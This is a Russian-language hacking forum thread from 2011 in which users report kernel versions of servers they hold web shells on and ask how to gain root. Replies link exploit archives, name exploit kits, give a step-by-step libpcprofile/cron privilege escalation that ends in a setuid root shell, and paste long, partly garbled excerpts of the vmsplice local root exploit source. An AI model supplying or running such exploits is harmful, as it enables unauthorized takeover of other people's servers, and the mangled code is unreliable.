2041 -rw-r--r-- 1 root root 67650 Aug 20 2010 symvers-2.6.9-89.0.28.EL.gz

18074 -rw-r--r-- 1 root root 67596 Aug 24 2009 symvers-2.6.9-89.0.9.EL.gz

2051 -rw-r--r-- 1 root root 67650 Sep 28 2010 symvers-2.6.9-89.29.1.EL.gz

2056 -rw-r--r-- 1 root root 67667 Oct 20 2010 symvers-2.6.9-89.31.1.EL.gz

2061 -rw-r--r-- 1 root root 67701 Dec 2 2010 symvers-2.6.9-89.33.1.EL.gz

6029 -rw-r--r-- 1 root root 67701 Jan 19 01:07 symvers-2.6.9-89.35.1.EL.gz

6039 -rw-r--r-- 1 root root 1538264 Feb 18 08:41 vmlinuz-2.6.9-100.EL

16 -rw-r--r-- 1 root root 1504101 Aug 12 2006 vmlinuz-2.6.9-42.EL

20 -rw-r--r-- 1 root root 1511833 Jun 26 2007 vmlinuz-2.6.9-55.0.2.EL

6033 -rw-r--r-- 1 root root 1511602 Sep 28 2007 vmlinuz-2.6.9-55.0.9.EL

10045 -rw-r--r-- 1 root root 1518785 Dec 19 2007 vmlinuz-2.6.9-67.0.1.EL

10065 -rw-r--r-- 1 root root 1519323 Jul 24 2008 vmlinuz-2.6.9-67.0.22.EL

10050 -rw-r--r-- 1 root root 1518757 Feb 3 2008 vmlinuz-2.6.9-67.0.4.EL

10090 -rw-r--r-- 1 root root 1545940 May 1 2009 vmlinuz-2.6.9-78.0.22.EL

10080 -rw-r--r-- 1 root root 1545983 Nov 20 2008 vmlinuz-2.6.9-78.0.8.EL

2012 -rw-r--r-- 1 root root 1536244 Nov 4 2009 vmlinuz-2.6.9-89.0.16.EL

2022 -rw-r--r-- 1 root root 1536247 Jan 8 2010 vmlinuz-2.6.9-89.0.19.EL

2032 -rw-r--r-- 1 root root 1536228 Mar 17 2010 vmlinuz-2.6.9-89.0.23.EL

2037 -rw-r--r-- 1 root root 1536380 May 6 2010 vmlinuz-2.6.9-89.0.25.EL

2042 -rw-r--r-- 1 root root 1536716 Aug 20 2010 vmlinuz-2.6.9-89.0.28.EL

18075 -rw-r--r-- 1 root root 1533159 Aug 24 2009 vmlinuz-2.6.9-89.0.9.EL

2052 -rw-r--r-- 1 root root 1536664 Sep 28 2010 vmlinuz-2.6.9-89.29.1.EL

2057 -rw-r--r-- 1 root root 1536908 Oct 20 2010 vmlinuz-2.6.9-89.31.1.EL

2062 -rw-r--r-- 1 root root 1536830 Dec 2 2010 vmlinuz-2.6.9-89.33.1.EL

6030 -rw-r--r-- 1 root root 1536995 Jan 19 01:06 vmlinuz-2.6.9-89.35.1.EL

131202 lrwxrwxrwx 1 root root 16 Dec 17 2007 /lib/libpcre.so.0 -> libpcre.so.0.0.1

133814 -rwxr-xr-x 1 root root 65560 Nov 29 2007 /lib/libpcre.so.0.0.1

131074 -rwxr-xr-x 1 root root 112212 Feb 18 02:45 /lib/ld-2.3.4.so

132966 lrwxrwxrwx 1 root root 11 Mar 3 01:22 /lib/ld-linux.so.2 -> ld-2.3.4.so

132951 lrwxrwxrwx 1 root root 13 Jul 28 2007 /lib/ld-lsb.so.3 -> ld-linux.so.2

sevenup
25.06.2011, 18:23
$ ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
total 26948
3637249 drwxr-xr-x 3 root root 4096 Apr 8 2009 .
2 drwxr-xr-x 24 root root 4096 Apr 8 2009 ..
3637250 -rw-r--r-- 1 root root 723178 Feb 11 2008 System.map-2.6.18-6-686
3637268 -rw-r--r-- 1 root root 928033 Mar 14 2009 System.map-2.6.26-1-686
3637251 -rw-r--r-- 1 root root 70682 Feb 11 2008 config-2.6.18-6-686
3637269 -rw-r--r-- 1 root root 91640 Mar 14 2009 config-2.6.26-1-686
3637254 drwxr-xr-x 2 root root 4096 Apr 8 2009 grub
3637267 -rw-r--r-- 1 root root 5259149 Apr 8 2009 initrd.img-2.6.18-6-686
3637266 -rw-r--r-- 1 root root 5259970 Apr 8 2009 initrd.img-2.6.18-6-686.bak
3637272 -rw-r--r-- 1 root root 6194894 Apr 8 2009 initrd.img-2.6.26-1-686
3637270 -rw-r--r-- 1 root root 6194909 Apr 8 2009 initrd.img-2.6.26-1-686.bak
3637252 -rw-r--r-- 1 root root 1260861 Feb 11 2008 vmlinuz-2.6.18-6-686
3637253 -rw-r--r-- 1 root root 1506512 Mar 14 2009 vmlinuz-2.6.26-1-686
12697846 -rw-r--r-- 1 root root 5440 Jan 4 2009 /lib/libpcprofile.so
12697768 -rwxr-xr-x 1 root root 113248 Jan 4 2009 /lib/ld-2.7.so
12697649 lrwxrwxrwx 1 root root 9 Apr 8 2009 /lib/ld-linux.so.2 -> ld-2.7.so


Скачай архив:


http://files.webi.ru/m_down/r00t.rar.html

файл с архива r00t.sh закачай на сервер и выполни следующие команды:


1. chmod +x r00t.sh
2. ./r00t.sh

3. whoami

в ответ получишь:

root

sevenup
25.06.2011, 18:25
total 55852
2 drwxr-xr-x 4 root root 8192 Mar 3 06:11 .
2 drwxr-xr-x 27 root root 4096 Jun 8 01:19 ..
6036 -rw-r--r-- 1 root root 770652 Feb 18 08:41 System.map-2.6.9-100.EL
14 -rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL
18 -rw-r--r-- 1 root root 754505 Jun 26 2007 System.map-2.6.9-55.0.2.EL
6031 -rw-r--r-- 1 root root 754717 Sep 28 2007 System.map-2.6.9-55.0.9.EL
132966 lrwxrwxrwx 1 root root 11 Mar 3 01:22 /lib/ld-linux.so.2 -> ld-2.3.4.so
132951 lrwxrwxrwx 1 root root 13 Jul 28 2007 /lib/ld-lsb.so.3 -> ld-linux.so.2


не пробить

Vald
28.06.2011, 14:16
sh-3.2$ ./r00t.sh

./r00t.sh: line 30: gcc: command not found

./r00t.sh: line 42: gcc: command not found

./r00t.sh: line 43: gcc: command not found

./r00t.sh: line 48: ./sh: No such file or directory

Вот что получаю в ответ.

sevenup
29.06.2011, 13:40
sh-3.2$ ./r00t.sh
./r00t.sh: line 30: gcc: command not found
./r00t.sh: line 42: gcc: command not found
./r00t.sh: line 43: gcc: command not found
./r00t.sh: line 48: ./sh: No such file or directory
Вот что получаю в ответ.


на сервере нет gcc...он скомпилировать сплойт не может

Вот вариант, в котором gcc не нужен:


Убираем маску прав доступ а для создаваемых файлов( ри umask 0 файлы будут созд ваться по умолчанию с пр вами"-rw-rw-rw-")

$umask 0

Для атаки будем использов ать стандартную библиотек у профилирования libpcprofile,в одящую в комплект libc:

$dpkg-S/lib/libpcprofile.so

libc6: /lib/libpcprofile.so

$ls-l/lib/libpcprofile.so

-rw-r--r--1 root root 5496 2010-10-12 03:32/lib/libpcprofile.so

Код инициализации libpcprofile не проверяет различия эфф ективного и текущего иден тификатора пользователя,н при этом позволяет созд ть лог-файл,который можно создат в любой системной дирек ории:

$LD_AUDIT="libpcprofile.so"PCPROFILE_OUTPUT="/etc/cron.d/exploit"ping

ERROR:ld.so:object'libpcprofile.so'cannot b e loadedasauditinterface:undefined symbol:la_ver sion;ignored.

Несмотря на вывод ошибки, роцедура инициализации в полнилась и в директории/etc/cron.d был создан лог-файл:

$ls-l/etc/cron.d/exploit

-rw-rw-rw-1 root taviso 65 2010-10-21 14:22/etc/cron.d/exploit

Как видно,права доступа н созданный файл,позволяют любому пользователю запи сать в него любые данные, оторые затем будут выпол ены системой cron от польз вателя root.Например:

$printf"* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n"> /etc/cron.d/exploit

Через пару минут наблюдае м:

$ls-l/tmp/exploit

ls:cannot access/tmp/exploit:No such fileordirectory

...

$ls-l/tmp/exploit

-rwsr-xr-x 1 root root 83888 2010-10-21 14:25/tmp/exploit

$ /tmp/exploit

# whoami

root



Если команда dpkg поддерживается то порутаешь...

попугай
29.06.2011, 14:07
2.6.18-53.1.19.el5.028stab053.14 #1 SMP Thu May 8 16:29:13 MSD 2008 i686 i686 i386 GNU/Linux


Чем можно порутать? sendpage не прокатил.

sevenup
29.06.2011, 18:49
Чем можно порутать? sendpage не прокатил.


какой из ? их 3 как бы...все пробовал ?

vasykas
30.06.2011, 02:47
есть вопрос:

ставлю эксплоит Kallsyms

выдает

sh: no job control in this shell

sh-3.2# exit

Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y

$$$ Kallsyms +r

$$$ K3rn3l r3l3as3: 2.6.18-128.el5

??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d

$$$ L00k1ng f0r kn0wn t4rg3tz..

$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...

$$$ selinux_ops->ffffffff8030d360

$$$ dummy_security_ops->ffffffff80496c00

$$$ capability_ops->ffffffff8030ec20

$$$ selinux_enforcing->ffffffff80499960

$$$ audit_enabled->ffffffff80485124

$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d

$$$ Prepare: m0rn1ng w0rk0ut b1tch3z

$$$ Us1ng st4nd4rd s3ash3llz

$$$ 0p3n1ng th3 m4giq p0rt4l

$$$ bl1ng bl1ng n1gg4 ppPpPPpPPPpP

вроде как прокатил

проверяю

id,whoami

пишет command not found

ядро старое

2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64

че за ерунда не пойму?

sevenup
30.06.2011, 16:04
есть вопрос:
ставлю эксплоит
Kallsyms
выдает
sh: no job control in this shell

sh-3.2# exit

Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y

$$$ Kallsyms +r

$$$ K3rn3l r3l3as3: 2.6.18-128.el5

??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d

$$$ L00k1ng f0r kn0wn t4rg3tz..

$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...

$$$ selinux_ops->ffffffff8030d360

$$$ dummy_security_ops->ffffffff80496c00

$$$ capability_ops->ffffffff8030ec20

$$$ selinux_enforcing->ffffffff80499960

$$$ audit_enabled->ffffffff80485124

$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d

$$$ Prepare: m0rn1ng w0rk0ut b1tch3z

$$$ Us1ng st4nd4rd s3ash3llz

$$$ 0p3n1ng th3 m4giq p0rt4l

$$$ bl1ng bl1ng n1gg4 ppPpPPpPPPpP
вроде как прокатил
проверяю
id,whoami
пишет
command not found
ядро старое
2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64
че за ерунда не пойму?


не знаю, не встречалось....возможно баш слетает...

вот попробуй этот:

http://turboupload.com/ndbm663kbwft

в архиве 2 скомпиленых сплойта....на каждый используй: chmod +x name_file

и запусти.

vasykas
30.06.2011, 22:20
не знаю, не встречалось....возможно баш слетает...
вот попробуй этот:
http://turboupload.com/ndbm663kbwft
в архиве 2 скомпиленых сплойта....на каждый используй: chmod +x name_file
и запусти.


Спасибо.

самое интенерсное в том что именно не все команды (открытие портов и т.д все ок) а важные

id, и т.д не выполняются) весь google пререрыл но так и не понятно. если хочешь в личку кину попробуй.

Добавлю

gcc,locale bind-back connect и все такое не катит.

Вот как тут быть е...ть.

sovok
30.06.2011, 23:05
есть под это?


Linux be2 2.6.32-5-amd64 #1 SMP Wed Nov 24 12:32:24 UTC 2010 x86_64 GNU/Linux

sevenup
01.07.2011, 01:22
Спасибо.
самое интенерсное в том что именно не все команды (открытие портов и т.д все ок) а важные
id, и т.д не выполняются) весь google пререрыл но так и не понятно. если хочешь в личку кину попробуй.
Добавлю
gcc,locale bind-back connect и все такое не катит.
Вот как тут быть е...ть.


Ну давай попробую, если что получится - отпишусь!


есть под это?


а что пробовал ?

асидбичес, роберт ю сак, фулл нелсон....выбора много...а справятся или нет - уже зависит от системы

vasykas
01.07.2011, 02:13
Ну давай попробую, если что получится - отпишусь!
а что пробовал ?
асидбичес, роберт ю сак, фулл нелсон....выбора много...а справятся или нет - уже зависит от системы


кааааак??????узнать то???

если не бинд-и т.д команды не выполняються.

пробовал руткит, putty курит......Как?

z0mbyak
01.07.2011, 02:15
Сообщение от sevenup
Ну давай попробую, если что получится - отпишусь!
а что пробовал ?
асидбичес, роберт ю сак, фулл нелсон....выбора много...а справятся или нет - уже зависит от системы
кааааак??????узнать то???
если не бинд-и т.д команды не выполняються.
пробовал руткит, putty курит......Как?


Пробовал запуск сплоитов из-под веба? На рдоте есть ман,если не пробывал...

P.S линя можно переписать как угодно, что-то вырезать, а что-то добавить...поэтому могут и не работать многие привычные команды...

vasykas
01.07.2011, 02:18
Пробовал запуск сплоитов из-под веба? На рдоте есть ман,если не пробывал...
P.S линя можно переписать как угодно, что-то вырезать, а что-то добавить...поэтому могут и не работать многие привычные команды...


по подробнее, ссыль если можно (какие команды . в google искал все не то)

z0mbyak
01.07.2011, 02:29
https://rdot.org/forum/showthread.php?t=57


Это про запуск из веба (если думаешь, что отваливается баш)

А переписать команды можно и самому, так как линь это опенсорс) поэтому кроме админа (программера) тебе их никто не назовет)

C-r-A-c-K
07.07.2011, 11:06
Не могу разобраться.

есть шелл Linux xxxxxx 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686

работает баг с dpkg.

cron выполняется с правами root

при выполнении "cp /bin/bash /tmp/exploit; chmod u+s /tmp/exploit"

создает /tmp/exploit, но при запуске /tmp/exploit юзер тот же www-data

как еще можно сделать запускаемую оболочку, в которой выполнялись бы права от root.

вопрос снимается)

сделал просто бинд порта с правами root.

C-r-A-c-K
08.07.2011, 01:01
помогите с Linux 2.6.27.23-201.19-xen #1 SMP 2009-05-26 17:02:05 -0400 x86_64

Ubuntu 10.04.2 LTS

gcc работает

dpkg тоже.

через баг dpkg неудалось поруутать, не создает лог файл в папке cron.d

sevenup
08.07.2011, 01:37
помогите с Linux 2.6.27.23-201.19-xen #1 SMP 2009-05-26 17:02:05 -0400 x86_64
Ubuntu 10.04.2 LTS
gcc работает
dpkg тоже.
через баг dpkg неудалось поруутать, не создает лог файл в папке cron.d


эм...."баг dpkg" это один из способов использования бага glibs...учитывая версию ядра...то она пробивается обычным способом....смотри сообщение:

348 (https://antichat.live/showpost.php/p/2727082/postcount/348/) этой темы.

C-r-A-c-K
08.07.2011, 02:28
sevenup,


$ cd /tmp
$ chmod +x r00t.sh
$ ./r00t.sh
System does not appear to be vulnerable
$ whoami
www-data


еще варианты имеются?

sevenup
08.07.2011, 02:39
sevenup,
еще варианты имеются?


асидбичес,роборт ю сак,фулл нельсон

C-r-A-c-K
08.07.2011, 18:14
спасибо, sevenup, приятно общаться)

мне интересно, через yum можно использовать баг как dpkg ?

подскажите будьте так добры.

Linux Fedora_10 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 ES

T 2008 x86_64 x86_64 x86_64 GNU/Linux

найду что-нибудь?

sevenup
08.07.2011, 18:32
спасибо, sevenup, приятно общаться)
мне интересно, через yum можно использовать баг как dpkg ?
подскажите будьте так добры.
Linux Fedora_10 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 ES
T 2008 x86_64 x86_64 x86_64 GNU/Linux
найду что-нибудь?


вариант с сообщения 348 (https://antichat.live/showpost.php/p/2727082/postcount/348/) не пробил ?

если нет, попробуйте enlightenment.

C-r-A-c-K
08.07.2011, 19:19
при обращении к .sh пишет perm denied

при компилировании какого либо сплоита из пака выдает errors

/usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t'

интересен баг с libpcprofile.so, он реализуем через yum ?

edge911
11.07.2011, 20:04
FreeBSD 6.4-RELEASE-p8 #1 r101746: Mon Aug 30

чем можно порутать? ничего не нашел, мб плохо искал....

sevenup
11.07.2011, 20:26
FreeBSD 6.4-RELEASE-p8 #1 r101746: Mon Aug 30
чем можно порутать? ничего не нашел, мб плохо искал....


http://www.1337day.com/exploits/15572

и

http://www.1337day.com/exploits/8126

Это единственный сплойты под это ядро.

Vald
12.07.2011, 07:22
6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:45:45 UTC 2008

А под это что-то? Ядро вроде старенькое.

vasykas
12.07.2011, 23:38
6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:45:45 UTC 2008
А под это что-то? Ядро вроде старенькое.


я думаю padlina2 прокатит

BUGAGAlter
13.07.2011, 05:29
Есть что?

Linux srv020 2.6.32-5-686-bigmem #1 SMP Mon Jun 13 05:03:09 UTC 2011 i686

<Cyber-punk>
13.07.2011, 05:58
Есть что?
Linux srv020 2.6.32-5-686-bigmem #1 SMP Mon Jun 13 05:03:09 UTC 2011 i686


http://www.exploit-db.com/exploits/14814/

vasykas
16.07.2011, 07:48
FreeBSD 8.2-STABLE #0: Wed Jun 22 17:51:47 UTC 2011

Есть что нибудь?

sevenup
16.07.2011, 14:46
FreeBSD 8.2-STABLE #0: Wed Jun 22 17:51:47 UTC 2011
Есть что нибудь?


Нет.

edge911
17.07.2011, 00:40
Linux 2.6.33.7-vs2.3.0.36.30.4 #23 SMP Tue Sep 28 05:47:35 PDT 2010 x86_64

Linux 2.6.18-238.12.1.el5PAE #1 SMP Tue May 31 14:02:45

Linux 2.4 #1 SMP Thu Nov 25 01:59:22 UTC 2010 i686 GNU/Linux

FreeBSD 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Wed Aug 18 19:46:13 EDT

подскажите, плиз

sevenup
17.07.2011, 01:29
Linux 2.6.33.7
Linux 2.6.18
Linux 2.4 i686 GNU/Linux
FreeBSD 7.3-RELEASE-p2
подскажите, плиз


и что тут подсказать?

показывайте полный вывод команды: uname -a

т.к. играет роль не только ядро но и дата сборки....

winstrool
17.07.2011, 01:52
вот это интиресует:

Linux **** 2.6.18-92.1.22.el5 #1 SMP Tue Dec 16 12:03:43 EST 2008 i686

Expl0ited
17.07.2011, 08:07
вот это интиресует:
Linux **** 2.6.18-92.1.22.el5 #1 SMP Tue Dec 16 12:03:43 EST 2008 i686


Для ядер 2.6.х даты сборки до июля 2009 идеально подходит сборка enlightenment:

http://www.grsecurity.net/~spender/enlightenment.tgz

edge911
18.07.2011, 00:44
Linux 2.6.33.7-vs2.3.0.36.30.4 #23 SMP Tue Sep 28 05:47:35 PDT 2010 x86_64
Linux 2.6.18-238.12.1.el5PAE #1 SMP Tue May 31 14:02:45
Linux 2.4 #1 SMP Thu Nov 25 01:59:22 UTC 2010 i686 GNU/Linux
FreeBSD 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Wed Aug 18 19:46:13 EDT
подскажите, плиз


мм?

vasykas
18.07.2011, 08:06
2.6.18 exploit

может кто подскажет почему ощибку дает:

2 сплоита

один на паблик выложен но умышленно не доделан:

[CODE]
/*

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)

*

* -static -Wno-format

*/

#define _GNU_SOURCE

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define __KERNEL__

#include

#define PIPE_BUFFERS 16

#define PG_compound 14

#define uint unsigned int

#define static_inline static inline __attribute__((always_inline))

#define STACK(x) (x + sizeof(x) - 40)

struct page {

unsigned long flags;

int count;

int mapcount;

unsigned long private;

void *mapping;

unsigned long index;

struct { long next, prev; } lru;

};

void exit_code();

char exit_stack[1024 * 1024];

void die(char *msg, int err)

{

printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));

fflush(stdout);

fflush(stderr);

exit(1);

}

#if defined (__i386__)

#ifndef __NR_vmsplice

#define __NR_vmsplice 316

#endif

#define USER_CS 0x73

#define USER_SS 0x7b

#define USER_FL 0x246

static_inline

void exit_kernel()

{

__asm__ __volatile__ (

"movl %0, 0x10(%%esp) ;"

"movl %1, 0x0c(%%esp) ;"

"movl %2, 0x08(%%esp) ;"

"movl %3, 0x04(%%esp) ;"

"movl %4, 0x00(%%esp) ;"

"iret"

: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),

"i" (USER_CS), "r" (exit_code)

);

}

static_inline

void * get_current()

{

unsigned long curr;

__asm__ __volatile__ (

"movl %%esp, %%eax ;"

"andl %1, %%eax ;"

"movl (%%eax), %0"

: "=r" (curr)

: "i" (~8191)

);

return (void *) curr;

}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice

#define __NR_vmsplice 278

#endif

#define USER_CS 0x23

#define USER_SS 0x2b

#define USER_FL 0x246

static_inline

void exit_kernel()

{

__asm__ __volatile__ (

"swapgs ;"

"movq %0, 0x20(%%rsp) ;"

"movq %1, 0x18(%%rsp) ;"

"movq %2, 0x10(%%rsp) ;"

"movq %3, 0x08(%%rsp) ;"

"movq %4, 0x00(%%rsp) ;"

"iretq"

: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),

"i" (USER_CS), "r" (exit_code)

);

}

static_inline

void * get_current()

{

unsigned long curr;

__asm__ __volatile__ (

"movq %%gs0), %0"

: "=r" (curr)

);

return (void *) curr;

}

#else

#error "unsupported arch"

#endif

sevenup
18.07.2011, 15:43
vasykas, вот исправленный код первого сплойта с твоего сообщения:

[CODE]
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
#define PAGE_SIZE getpagesize()
#define __KERNEL__
#include


#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
